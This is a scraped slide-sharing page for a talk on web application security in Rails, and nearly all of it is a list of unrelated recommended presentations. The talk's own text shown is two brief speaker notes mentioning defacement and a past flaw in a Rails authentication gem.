Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 

Recently uploaded (20)

Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 

Web Application Security in Rails

Editor's Notes

  1. Can do defacement as well
  2. Was also found at ThoughtBot clearance – Rails authentication gem